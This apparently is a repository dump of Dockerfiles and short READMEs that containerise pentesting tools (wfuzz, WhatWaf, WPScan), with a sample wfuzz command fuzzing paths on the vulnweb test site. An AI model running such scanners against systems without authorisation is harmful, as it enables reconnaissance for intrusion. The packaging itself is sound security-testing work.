-------------------------------------------------------------------------------- /wfuzz_github/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y 5 | 6 | RUN git clone https://github.com/xmendez/wfuzz.git 7 | 8 | RUN cd /wfuzz && python setup.py install 9 | 10 | ENTRYPOINT [ "wfuzz" ] -------------------------------------------------------------------------------- /wfuzz_github/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | docker run wfuzz -z file,wfuzz/wordlist/general/common.txt -p 0.0.0.0:8080 http://testphp.vulnweb.com/FUZZ 3 | ``` -------------------------------------------------------------------------------- /wfuzz_pip/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | pip install wfuzz 5 | 6 | ENTRYPOINT [ "wfuzz" ] -------------------------------------------------------------------------------- /wfuzz_pip/README.md: -------------------------------------------------------------------------------- 1 | ## Documentation 2 | 3 | https://wfuzz.readthedocs.io/en/latest/ 4 | -------------------------------------------------------------------------------- /whatwaf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone https://github.com/Ekultek/WhatWaf.git 6 | 7 | WORKDIR /WhatWaf 8 | 9 | RUN pip install -r requirements.txt 10 | 11 | RUN python setup.py 12 | 13 | -------------------------------------------------------------------------------- /whatwaf/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AvasDream/pentesting-dockerfiles/dbe3efa3ec16dcf457b9e8708b8bb3a5c353fd7f/whatwaf/README.md -------------------------------------------------------------------------------- /wpscan/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ruby:2.6.3-alpine AS builder 2 | ARG BUNDLER_ARGS="--jobs=8 --without test development" 3 | 4 | RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc 5 | RUN apk add --no-cache git 6 | RUN git clone https://github.com/wpscanteam/wpscan.git 7 | 8 | RUN apk add --no-cache git libcurl ruby-dev libffi-dev make gcc musl-dev zlib-dev procps sqlite-dev && \ 9 | bundle install --system --clean --no-cache --gemfile=/wpscan/Gemfile $BUNDLER_ARGS && \ 10 | # temp fix for https://github.com/bundler/bundler/issues/6680 11 | rm -rf /usr/local/bundle/cache 12 | 13 | WORKDIR /wpscan 14 | RUN rake install --trace 15 | 16 | # needed so non superusers can read gems 17 | RUN chmod -R a+r /usr/local/bundle 18 | 19 | 20 | FROM ruby:2.6.3-alpine 21 | LABEL maintainer="WPScan Team " 22 | 23 | RUN adduser -h /wpscan -g WPScan -D wpscan 24 | 25 | COPY --from=builder /usr/local/bundle /usr/local/bundle 26 | 27 | RUN chown -R wpscan:wpscan /wpscan 28 | 29 | # runtime dependencies 30 | RUN apk add --no-cache libcurl procps sqlite-libs 31 | 32 | WORKDIR /wpscan 33 | 34 | USER wpscan 35 | 36 | RUN /usr/local/bundle/bin/wpscan --update --verbose 37 | 38 | ENTRYPOINT ["/usr/local/bundle/bin/wpscan"] --------------------------------------------------------------------------------